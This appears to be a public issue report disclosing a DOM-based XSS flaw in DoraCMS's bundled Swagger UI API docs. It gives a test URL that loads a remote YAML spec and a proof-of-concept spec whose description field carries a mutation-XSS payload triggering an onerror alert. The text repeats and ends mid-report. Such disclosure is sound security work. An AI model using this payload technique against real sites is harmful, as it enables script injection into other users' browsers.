Open Lq0ne opened 4 months ago
Doracms uses outdated version of swagger to build apidoc, which contains a known Dom-based XSS vulnerability. You can just add this parameter to the URL to test your site. https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml
POC:
swagger: '2.0' info: title: Example yaml.spec description: | <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror=alert('xss')>"> paths: /accounts: get: responses: '200': description: No response was specified tags: - accounts operationId: findAccounts summary: Finds all accounts
Doracms uses outdated version of swagger to build apidoc, which contains a known Dom-based XSS vulnerability. You can just add this parameter to the URL to test your site. https://[HOST]/static/apidoc/index.html?url=https://jumpy-floor.surge.sh/test.yaml
POC: